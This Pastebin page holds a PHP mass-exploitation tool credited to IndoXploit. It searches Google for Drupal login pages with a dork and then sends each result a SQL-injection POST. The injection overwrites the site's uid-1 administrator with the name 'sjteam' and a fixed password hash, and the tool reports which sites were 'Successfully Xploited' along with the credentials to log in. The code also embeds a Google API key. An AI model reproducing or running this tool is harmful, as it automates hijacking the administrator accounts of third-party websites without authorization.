Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /* Tools ini Dibuat oleh Mr. Error 404 | IndoXploit - Sanjungan Jiwa
- Segala bentuk copy paste harap tidak mengubah copyright asli - hak cipta 2015 IndoXploit - Sanjungan Jiwa
- Hargailah karya sang pencipta ^_^
- Salam hangat IndoXploit Coders Team
- Karya Asli anak Bangsa !!!
- */
- set_time_limit(0);
- ini_set('memory_limit', '64M');
- header('Content-Type: text/html; charset=UTF-8');
- function letItBy() {
- ob_flush();
- flush();
- }
- function google_that($query, $page=1){
- $resultPerPage=8;
- $start = $page*$resultPerPage;
- $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&key=AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
- $resultFromGoogle = json_decode( http_get($url, true) ,true);
- if(isset($resultFromGoogle['responseStatus'])) {
- if($resultFromGoogle['responseStatus'] != '200') return false;
- if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
- else return $resultFromGoogle['responseData']['results'];
- } else
- die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
- }
- function http_get($url, $safemode = false){
- if($safemode === true) sleep(1);
- $im = curl_init($url);
- curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($im, CURLOPT_HEADER, 0);
- return curl_exec($im);
- curl_close();
- }
- function check_injection($url){
- return http_get(str_replace(array("/user/login","?q=node&destination=node","/user/","/login/","/drupal/"), "", $url));
- }
- ?>
- <!DOCTYPE html>
- <style type="text/css">
- a {
- text-decoration: none;
- color: lime;
- }
- html {
- background: #000000;
- color: #008000;
- }
- </style>
- <form method="post">
- Dork:
- <input style="border: 1px dashed #008000; background: transparent; color: #bb0000; padding-left: 5px;" type="text" id="dork" name="dork" value="inurl:/user/login" />
- <input style="border: 1px dashed #008000; background: transparent; color: #bb0000;" type="submit" value="Start" id="button"/>
- </form>
- <?php
- if(isset($_POST['dork']{0})){
- echo "<hr width='50%' color='#008000'>";
- letItBy();
- for($googlePage = 1; $googlePage <= 10; $googlePage++){
- $googleResult = google_that($_POST['dork'], $googlePage);
- if(!$googleResult){
- echo 'google dont have more result, so I done..(?)';
- break;
- }
- for($victim = 0; $victim < sizeof($googleResult); $victim++) {
- if(check_injection($googleResult[$victim]['unescapedUrl'])){
- echo "<div style='margin: 5px auto; padding-left: 7px;'>";
- $sites = "http://".$googleResult[$victim]['visibleUrl']."";
- $log = "/user/login";
- $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
- $params = array(
- 'http' => array(
- 'method' => 'POST',
- 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
- 'content' => $post_data
- ));
- $ctx = stream_context_create($params);
- $data = @file_get_contents($sites . '/user/login/', null, $ctx);
- if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
- echo "Scanning: <font color=lime>$sites</font><br>";
- echo "Status: Successfully Xploited!<br>";
- echo "Data=> user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
- echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
- } else {
- echo "Scanning: <font color=lime>$sites</font><br>";
- echo "Status: <font color=red>Not Xploited!</font><br><br>";
- }
- } echo "</div>";
- letItBy();
- }
- }
- }
- ?>
- </div>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
